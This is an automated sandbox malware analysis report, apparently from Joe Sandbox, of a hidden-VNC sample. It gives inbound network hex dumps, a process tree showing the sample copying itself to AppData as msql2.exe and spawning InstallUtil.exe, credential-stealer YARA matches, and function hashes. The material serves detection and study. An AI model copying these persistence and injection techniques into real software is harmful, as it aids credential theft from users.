3f b4 7d 5e 18 bc 12 fe ed 8f 20 4d 2c 39 90 1b 50 bd 96 36 5d 27 6b 3c 1c dd e4 67 46 3e 38 37 48 24 b2 33 d7 89 3b d0 f0 df e2 47 de b3 d0 ff dd 88 b1 03 54 5c e6 18 67 7a 45 27 c8 Data Ascii: \Gz}Mi]mea7+q4~Uy@oM?9+W)EvfASx~">wiN'YnoADYY9Vz&8Epvb9NfjK].vw&76e{]?}^ M,9P6]'k<gF>87H$3;GT\gzE'
2024-10-13 16:15:22 UTC	1024	IN	Data Raw: 24 77 2a 03 41 99 f9 20 a1 dd db 24 d1 1a b0 68 12 4f ba 90 0f 96 8a b3 d0 3b e1 32 72 92 d2 c4 5e c7 72 0b 8d 44 92 ba 0a 53 0b 1c 42 8a dc e3 12 4c ce 5b 30 78 25 d6 70 57 25 2f 6b 6e 2a 30 8c 9a 9b 19 9e b4 89 63 9b 6c 23 3b 41 04 c3 69 2a cf 89 ce 04 8d 05 6e e9 33 80 b4 c1 c0 61 16 6d 9e 95 e1 0e e3 2a 28 1e 0d e3 9e 48 64 16 4d d7 f5 14 40 5a 45 8b 4b 46 13 b7 c1 5e 79 cd d0 52 e7 37 0b 98 32 b3 c9 3d 18 9e 26 20 86 ee 43 12 c3 e7 15 42 58 70 b6 ce fe 8c ed e9 8e 50 28 cf d3 d5 3a 6a d1 63 b9 ec 31 05 6a 93 e5 41 98 e8 18 46 55 6c 40 0f 23 31 75 39 0d 6b 53 a3 73 3b 10 69 81 a6 91 fc 45 0a be 3d 61 38 a1 05 5b f4 23 2c 73 1e 47 e4 0e 06 e3 16 2a 6e bb 89 f0 8b 74 a8 9c 2d 35 65 ae f6 2b b6 77 0d 46 eb 57 0d 87 c3 6a 44 ac a1 fe 8c 9b b6 e4 e1 38 73 Data Ascii: $wA $hO;2r^rDSBL[0x%pW%/kn0cl#;Ain3am(HdM@ZEKF^yR72=& CBXpP(:jc1jAFUl@#1u9kSs;iE=a8[#,sG*nt-5e+wFWjD8s
2024-10-13 16:15:22 UTC	16384	IN	Data Raw: 1d bc 15 97 1e 30 86 27 7e 7a e6 48 a2 e9 49 d6 7c 11 88 eb 7c ff d8 3e 45 cf 9e b6 5f e1 30 89 07 37 79 f2 8f bc 63 e6 19 37 19 c7 27 f0 55 99 0d 56 12 52 6b 78 93 43 6f be 70 ef dd a5 7f b0 82 fa aa 72 58 41 ca b7 c4 c0 a6 62 4c 6c 90 80 3d 9c 6d cc c6 31 e3 b1 fd 9c 9c 2f 3c 3e b5 36 d8 dc d7 8e 7c 8c 32 ee 63 e6 b8 aa b4 24 fb 08 56 b0 2e 7f 06 20 12 c8 97 3a 25 a3 04 bf 07 87 37 40 75 d5 ac 62 d2 3b b5 df dd 45 2f c6 f8 91 2e cb ce 86 0d e6 69 6c b4 3c 4a ad c4 7d 0e 88 c3 51 80 81 4a 63 dd d1 1e a6 a4 71 19 88 b6 b5 63 8c d7 a8 47 5e 98 44 dd e8 ec 8a 67 4f df f7 43 e8 8b 91 b5 bc 85 45 aa 10 ce 92 ba e3 26 3c 9b 72 03 cc 46 17 08 94 44 a3 77 4b 77 f3 7f 4d 13 fe 86 ea bb 6e 42 78 46 e5 23 97 d2 c2 36 ed 36 e7 9b 14 a1 33 8e e9 ef d7 17 4a e3 ba 1c Data Ascii: 0'~zHI\|\|>E_07yc7'UVRkxCoprXAbLl=m1/<>6\|2c$V. :%7@ub;E/.il<J}QJcqcG^DgOCE&<rFDwKwMnBxF#663J
2024-10-13 16:15:22 UTC	1024	IN	Data Raw: b4 8a c9 5a d8 e1 6a c2 04 b4 48 9e fd df c6 99 36 7d c1 0a d4 54 50 14 09 dd bc 7c 86 15 3f a5 4d 1c f3 08 53 e4 c0 fa b0 6d 75 bd 34 a9 2a 99 9c 40 42 0a 6e 8a 34 28 40 c8 a0 93 7d 9d 28 0b f6 50 b0 d6 db 59 d5 54 2f cd d0 1c d6 33 f9 01 fc f1 ec ea d9 f3 5c 72 35 c8 ba cb 94 fb 93 7d 49 9a 0a 56 82 40 a9 23 2a 50 15 48 62 eb 1b 7c 94 23 f0 1a 16 f2 cb a4 a9 e2 ac e5 3e 9d 62 7d ce 24 bc 14 ce 1a 02 1a c6 67 3b 69 88 14 bd b9 3d 07 7a d8 67 d1 f5 6e d3 85 c7 56 c6 5f 4e e0 70 e0 b2 f1 3b 8f b2 1b d6 e2 1a d2 58 e8 ad 11 58 8f 6a 14 99 92 9c 19 27 10 9b 0f 3e 2d 48 dc d6 dd e7 9b 40 b2 a3 e4 e4 96 7c 15 bc 6c 66 d4 cd 53 00 06 22 3e 1e ce 46 2f 4c 91 6a 06 78 ef c5 0e ab dc 25 6f 2b 1d 69 97 bf 1b 1b 32 c7 03 b5 b3 2e 6e 0e 09 2b 02 d3 b6 cc bf 17 75 3b Data Ascii: ZjH6}TP\|?MSmu4@Bn4(@}(PYT/3\r5}IV@#PHb\|#>b}$g;i=zgnV_Np;XXj'>-H@\|lfS">F/Ljx%o+i2.n+u;

Target ID:	0
Start time:	12:14:59
Start date:	13/10/2024
Path:	C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe"
Imagebase:	0x970000
File size:	1'489'920 bytes
MD5 hash:	177136A947A8677C09FC4C9891B18DDE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1728479466.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1745104377.00000000065F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:15:03
Start date:	13/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x570000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	12:15:12
Start date:	13/10/2024
Path:	C:\Users\user\AppData\Roaming\msql2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\msql2.exe"
Imagebase:	0x550000
File size:	1'489'920 bytes
MD5 hash:	177136A947A8677C09FC4C9891B18DDE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.1867578030.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 26%, ReversingLabs Detection: 34%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:15:17
Start date:	13/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0xb50000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2020798393.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:15:20
Start date:	13/10/2024
Path:	C:\Users\user\AppData\Roaming\msql2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\msql2.exe"
Imagebase:	0xf50000
File size:	1'489'920 bytes
MD5 hash:	177136A947A8677C09FC4C9891B18DDE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.1936667834.0000000003572000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:15:24
Start date:	13/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x5f0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.2%
Total number of Nodes:	277
Total number of Limit Nodes:	13

Executed Functions

Function 06430A00 Relevance: 16.2, Strings: 12, Instructions: 1158COMMON

Download Yara Rule

Strings

,bq, xrefs: 064314CA
$^q, xrefs: 0643134A
$^q, xrefs: 06430E57
$^q, xrefs: 06430CA3
4, xrefs: 064313E5
$^q, xrefs: 0643133A
$^q, xrefs: 06430F17
$^q, xrefs: 064312F1
$^q, xrefs: 06430E67
$^q, xrefs: 064312E1
$^q, xrefs: 06430F07
$^q, xrefs: 06430C93

Memory Dump Source

Source File: 00000000.00000002.1743926690.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6430000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-312445597
Opcode ID: 07c96336216050adc731b037bbbad98fd0bec701b2bcfab01f931f2a6e8daec7
Instruction ID: 6c2aeab9ea2c073983d6b3ef47b9661d0c820bfd890a057b74e4e2d03abb117f
Opcode Fuzzy Hash: 07c96336216050adc731b037bbbad98fd0bec701b2bcfab01f931f2a6e8daec7
Instruction Fuzzy Hash: B0B22B34A00228CFDB59DFA5C984BAEB7B6BF48700F15859AE505AB3A5CB70EC45CF50

Function 06430D37 Relevance: 8.0, Strings: 6, Instructions: 495COMMON

Download Yara Rule

Strings

,bq, xrefs: 064314CA
$^q, xrefs: 06430E57
4, xrefs: 064313E5
$^q, xrefs: 0643133A
$^q, xrefs: 064312E1
$^q, xrefs: 06430F07

Memory Dump Source

Source File: 00000000.00000002.1743926690.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6430000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID: ,bq$4$$^q$$^q$$^q$$^q
API String ID: 0-2546334966
Opcode ID: 1c24693660eefccdcbbf85286d650b54fe057b129cf106a0a30f1d0d4bcaffdd
Instruction ID: 80f846990607647de65a5018cf90558592d241b69b590ef26e8fc64550365d7b
Opcode Fuzzy Hash: 1c24693660eefccdcbbf85286d650b54fe057b129cf106a0a30f1d0d4bcaffdd
Instruction Fuzzy Hash: 21221A34A00229CFDB65DFA5C984BADB7B2BF48700F14819AD509AB3A5DB30ED85CF50

Function 02DF78A0 Relevance: 6.0, Strings: 4, Instructions: 983
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 02DF7FC3
xbaq, xrefs: 02DF79CD
pbq, xrefs: 02DF845A
TJcq, xrefs: 02DF7A42

Memory Dump Source

Source File: 00000000.00000002.1728364960.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID: TJcq$Te^q$pbq$xbaq
API String ID: 0-1954897716
Opcode ID: 960c932e2ff8f96d187ddf6eaa7fe3268ea309968194714ce5619522589580b4
Instruction ID: 001cdfe70d628901d736acfab48c9d98929ae3bd40d2485e76dfbcfbebb30d09
Opcode Fuzzy Hash: 960c932e2ff8f96d187ddf6eaa7fe3268ea309968194714ce5619522589580b4
Instruction Fuzzy Hash: E2A2B675A00228CFDB64CF69C984AD9BBB2FF89304F1581E9D509AB365DB319E81CF50

Function 064FB548 Relevance: 4.3, Strings: 3, Instructions: 543
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fcq, xrefs: 064FB667
8, xrefs: 064FB654
"Nm2, xrefs: 064FB987

Memory Dump Source

Source File: 00000000.00000002.1744675853.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64f0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID: fcq$"Nm2$8
API String ID: 0-2515173089
Opcode ID: 1fabffe776ace18e822fe45b60a0a6aea115c052129b35d73fae5307747fed9b
Instruction ID: 3c2735ccb946ed5325edd3959fb6425e2b65aef66056c9d55074e195be27a4bf
Opcode Fuzzy Hash: 1fabffe776ace18e822fe45b60a0a6aea115c052129b35d73fae5307747fed9b
Instruction Fuzzy Hash: 5F42B275D006298BDB64DF69C850AD9B7B2BF89300F1486EAD50DA7350EB30AE85CF90

Function 06434410 Relevance: 3.1, Strings: 2, Instructions: 644
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Pl^q, xrefs: 064345F8
$^q, xrefs: 064346DE

Memory Dump Source

Source File: 00000000.00000002.1743926690.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6430000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID: Pl^q$$^q
API String ID: 0-2677662154
Opcode ID: b8f7b2c741144bb7ff1f80dc3450cb5753363274f9842749ce5c5491a9214e2f
Instruction ID: 74b6ede27389f6d632b5e508c18404934939d29dfe580a96ece4b7cd8fe0f509
Opcode Fuzzy Hash: b8f7b2c741144bb7ff1f80dc3450cb5753363274f9842749ce5c5491a9214e2f
Instruction Fuzzy Hash: E5326B34B002188FDB99DF29C584AAA7BF6BF89701B2584AAD506CF375DB31DC42CB51

Function 064FB538 Relevance: 2.7, Strings: 2, Instructions: 154COMMON

Download Yara Rule

Strings

h, xrefs: 064FB648
fcq, xrefs: 064FB667

Memory Dump Source

Source File: 00000000.00000002.1744675853.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64f0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID: fcq$h
API String ID: 0-1849521214
Opcode ID: bc2fa2bb5bd6803fd55ffd1c8972ae8558ec28101c9b2ed01fc4a9f26e381a83
Instruction ID: 23d5734a1d6b340d3b9ea91389f75a1bf48695af2167c4ae0a69c74c4f5394a2
Opcode Fuzzy Hash: bc2fa2bb5bd6803fd55ffd1c8972ae8558ec28101c9b2ed01fc4a9f26e381a83
Instruction Fuzzy Hash: 3B61D771D006299BEB64DF6AC8507DAFBB2FF89300F14C2AAD50DA7254DB305A85CF91

Function 064FE280 Relevance: 1.6, APIs: 1, Instructions: 110nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 064FE33D

Memory Dump Source

Source File: 00000000.00000002.1744675853.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64f0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: f5117f9aa7cc44ce2e30fa4bc2ee1b623854e416ea15c9ab1bfdd823ab86172d
Instruction ID: 953928ddbd7693963336546e4fcb7cd4e52c51d243cdc5c64b71fc2f27091159
Opcode Fuzzy Hash: f5117f9aa7cc44ce2e30fa4bc2ee1b623854e416ea15c9ab1bfdd823ab86172d
Instruction Fuzzy Hash: A84178B5D00258DFCF10CFAAD984ADEFBB5BB49310F10902AE914B7210D735A945CF68

Function 064FE288 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 064FE33D

Memory Dump Source

Source File: 00000000.00000002.1744675853.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64f0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 36f6b82222a0481f4c57d42e95e38256c01994f848b773fea6077ce2cdca70c9
Instruction ID: 55176ec0c178bde104ec5bd6c9a819864704fc03eae3c4776ba22b84bbc2b8c7
Opcode Fuzzy Hash: 36f6b82222a0481f4c57d42e95e38256c01994f848b773fea6077ce2cdca70c9
Instruction Fuzzy Hash: 8F4197B5D002589FCF10CFAAD984ADEFBB1BB49310F10902AE918B7310D735A946CF68

Function 064FFC0A Relevance: 1.6, APIs: 1, Instructions: 86nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 064FFC9E

Memory Dump Source

Source File: 00000000.00000002.1744675853.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64f0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: ef749d07fdf69adf04eee754fbc4ff5583704154a43ca7a71ef0c3b2603899ea
Instruction ID: 307ce89eeff6bbd774feaad4e62e55e302ba39c8cb6288e548cc36a662fcb651
Opcode Fuzzy Hash: ef749d07fdf69adf04eee754fbc4ff5583704154a43ca7a71ef0c3b2603899ea
Instruction Fuzzy Hash: 0A319BB5D012589FCB10DFA9D980ADEFBF5FB49310F20942AE914B7210D735A945CFA4

Function 064FFC10 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 064FFC9E

Memory Dump Source

Source File: 00000000.00000002.1744675853.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64f0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f4c28b19e7b4dd59623a5a2be8f1254d7af5ea672754a54eb760f55855f7eb00
Instruction ID: 9dc6f49fc9e8da9292c75352a15ead40045510b4fbc9e0cdded82d9fcee3da35
Opcode Fuzzy Hash: f4c28b19e7b4dd59623a5a2be8f1254d7af5ea672754a54eb760f55855f7eb00
Instruction Fuzzy Hash: C231A9B5D012589FCB10CFAAD980ADEFBF1BB49310F20942AE914B7310C735A945CF94

Function 064F6AF0 Relevance: 1.5, Strings: 1, Instructions: 278COMMON

Download Yara Rule

Strings

PH^q, xrefs: 064F6D9C

Memory Dump Source

Source File: 00000000.00000002.1744675853.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64f0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 39466aac035826e0873a2a8c7b125deb5a8845746b93eae3f02450e67c7aae39
Instruction ID: 3f19a9ddddf2681bc7927346e8e49ec9c0aa81bc929609f46c0ab5e25de329c3
Opcode Fuzzy Hash: 39466aac035826e0873a2a8c7b125deb5a8845746b93eae3f02450e67c7aae39
Instruction Fuzzy Hash: C9C13570D15228CFEBA4CFA9C9447ADBBF2FF49304F2191AAD209A7254DB715985CF40

Function 068DD890 Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

Deq, xrefs: 068DD995

Memory Dump Source

Source File: 00000000.00000002.1745854815.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68c0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID: Deq
API String ID: 0-948982800
Opcode ID: a5f3f30e3ed8c3096f4d22e8dbff2fb1b6896e46d970b46e45378d5807fecd69
Instruction ID: 0f81d55b4d256972f7b376064f46da4bd5ce11bcfb673f48eb6b9c5ef677a4d8
Opcode Fuzzy Hash: a5f3f30e3ed8c3096f4d22e8dbff2fb1b6896e46d970b46e45378d5807fecd69
Instruction Fuzzy Hash: F4D1D174E00218CFDB58DFA9D884B9DBBB2BF88304F5085A9D409AB365DB31AD81CF51

Function 064A7380 Relevance: 1.5, Strings: 1, Instructions: 274COMMON

Download Yara Rule

Strings

Te^q, xrefs: 064A7518

Memory Dump Source

Source File: 00000000.00000002.1744322451.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64a0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: eba4ccd7803a5a69617ccf57c801af72bdab4f0eb18bc553ed62b6d23e581232
Instruction ID: fcad979846749da1ffd54a564043ac79c1930a8bab8204019bda5a97246a6b27
Opcode Fuzzy Hash: eba4ccd7803a5a69617ccf57c801af72bdab4f0eb18bc553ed62b6d23e581232
Instruction Fuzzy Hash: 6FC11778D01218DFDBA4DFA9D8847ADBBF6FB58304F1090AAD409A7355EB705986CF40

Function 064F6ADF Relevance: 1.5, Strings: 1, Instructions: 274COMMON

Download Yara Rule

Strings

PH^q, xrefs: 064F6D9C

Memory Dump Source

Source File: 00000000.00000002.1744675853.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64f0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 1d549b816e63c61429f983910568bb635a7db5361f2d7f1eea2a4efaea4997cd
Instruction ID: 179cda472b5a2b60cea8e5d27e00a326f93fbefcff2df0e7c91a82ea1b79038f
Opcode Fuzzy Hash: 1d549b816e63c61429f983910568bb635a7db5361f2d7f1eea2a4efaea4997cd
Instruction Fuzzy Hash: 7CC12570D15218CFEBA4CFA9C944B9EBBF2FF49304F2191AAD209A7254DB715985CF40

Function 064A7390 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

Te^q, xrefs: 064A7518

Memory Dump Source

Source File: 00000000.00000002.1744322451.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64a0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: a5c4af6277e76873e88511299e9e35db873bd631e1b9d4e6c3caa852a9ca4491
Instruction ID: f1bd4a01c4f975d2f63ba34ba3464815a9185475c65cbbfa40540179e5c1b4a5
Opcode Fuzzy Hash: a5c4af6277e76873e88511299e9e35db873bd631e1b9d4e6c3caa852a9ca4491
Instruction Fuzzy Hash: 80A12878E05218DFEBA4CFA9C884BADBBF6FB59304F10906AD409A7355DB705986CF40

Function 02DFE648 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1728364960.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04d9cbf5e171a8549186a4a65c58ab82a39e324672d105b13d50205d5813abc7
Instruction ID: 4efffaff03f84caba06b38c1f244bfe296afd7ee03b9af87210b73214175ceca
Opcode Fuzzy Hash: 04d9cbf5e171a8549186a4a65c58ab82a39e324672d105b13d50205d5813abc7
Instruction Fuzzy Hash: 2CD1D0B49052A88FDB64CFA9C944BDDBBF1FB49304F118099D509AB365C7749E88CF09

Function 02DF2930 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1728364960.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddc1bd543831d5ad1136339eec0694e720d51a850a52d632f52e354945fc7681
Instruction ID: fa9ee21de5ae2a927a6748d6320f845bbdc08e25d4e328e49663f1423f70926f
Opcode Fuzzy Hash: ddc1bd543831d5ad1136339eec0694e720d51a850a52d632f52e354945fc7681
Instruction Fuzzy Hash: 2F81D230A44205CFEB99CF29D888BAA77F2FB84304F1681A5DE05973A9C7749C85CF58

Function 064F8082 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1744675853.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64f0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99c958cf5e78a8aa4cbd0167a43d6a91ef1c55357feab0a35a619e2cf1163b8f
Instruction ID: 942770e9b3b8bb1582c631d42e2101dea61d8950fa0da6c503e495c7fc0e53f3
Opcode Fuzzy Hash: 99c958cf5e78a8aa4cbd0167a43d6a91ef1c55357feab0a35a619e2cf1163b8f
Instruction Fuzzy Hash: A651E574E01218CFEB58CFAAD944BDEBBF2BF89300F0481AAD519AB254D7745986CF50

Function 064F8088 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1744675853.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64f0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f440a8e81371db96a3a12de5373caca75ea92f9c8277d7518319c3539a31c42
Instruction ID: 97c2b362bd57b3de9cae5c3874dcd8eab43882c3c2d5c41d2d4f1753c406d85c
Opcode Fuzzy Hash: 7f440a8e81371db96a3a12de5373caca75ea92f9c8277d7518319c3539a31c42
Instruction Fuzzy Hash: EB51F5B4E05218CFEB58CF9AD9447DEBBF2BF89300F0481AAD519AB254D7740986CF40

Function 064A06CA Relevance: 3.8, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

<, xrefs: 064A1614
!, xrefs: 064A1A3A
5, xrefs: 064A1A66

Memory Dump Source

Source File: 00000000.00000002.1744322451.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64a0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID: !$5$<
API String ID: 0-3925111706
Opcode ID: 4e5a2ed96a8fa1bacdbaf77731c7e3e3c03a022a42d5d524ecf68089caa63fb5
Instruction ID: 160f4c0ff3e4b56be517c1f146fabb66eb5eb2dbcfb8a5f68c6445ac01851277
Opcode Fuzzy Hash: 4e5a2ed96a8fa1bacdbaf77731c7e3e3c03a022a42d5d524ecf68089caa63fb5
Instruction Fuzzy Hash: D341AE74D02329DFDBA5AF20C8887EDBBB2AB18719F1454EAD10AB3290C7740AC4CF55

Function 06400D98 Relevance: 3.1, Strings: 2, Instructions: 577COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06401549
4'^q, xrefs: 06401559

Memory Dump Source

Source File: 00000000.00000002.1743749152.0000000006400000.00000040.00000800.00020000.00000000.sdmp, Offset: 06400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6400000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: f7c052dd5272ebaf0fc4ea6e929354f94adc437b3c18a261a940294d8b3cd5c9
Instruction ID: 40a8e6a65c905d3233cccb11850e1ef1a6802271ec12caa50cf6ac5b888d92d5
Opcode Fuzzy Hash: f7c052dd5272ebaf0fc4ea6e929354f94adc437b3c18a261a940294d8b3cd5c9
Instruction Fuzzy Hash: 3942EB34E04229CFEB95DFD4D545AAEBBB2FF49305F50802AD912AB394C7349846CF91

Function 064018C0 Relevance: 2.9, Strings: 2, Instructions: 362
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 06401D66
4'^q, xrefs: 06401D56

Memory Dump Source

Source File: 00000000.00000002.1743749152.0000000006400000.00000040.00000800.00020000.00000000.sdmp, Offset: 06400000, based on PE: false

Joe Sandbox IDA Plugin

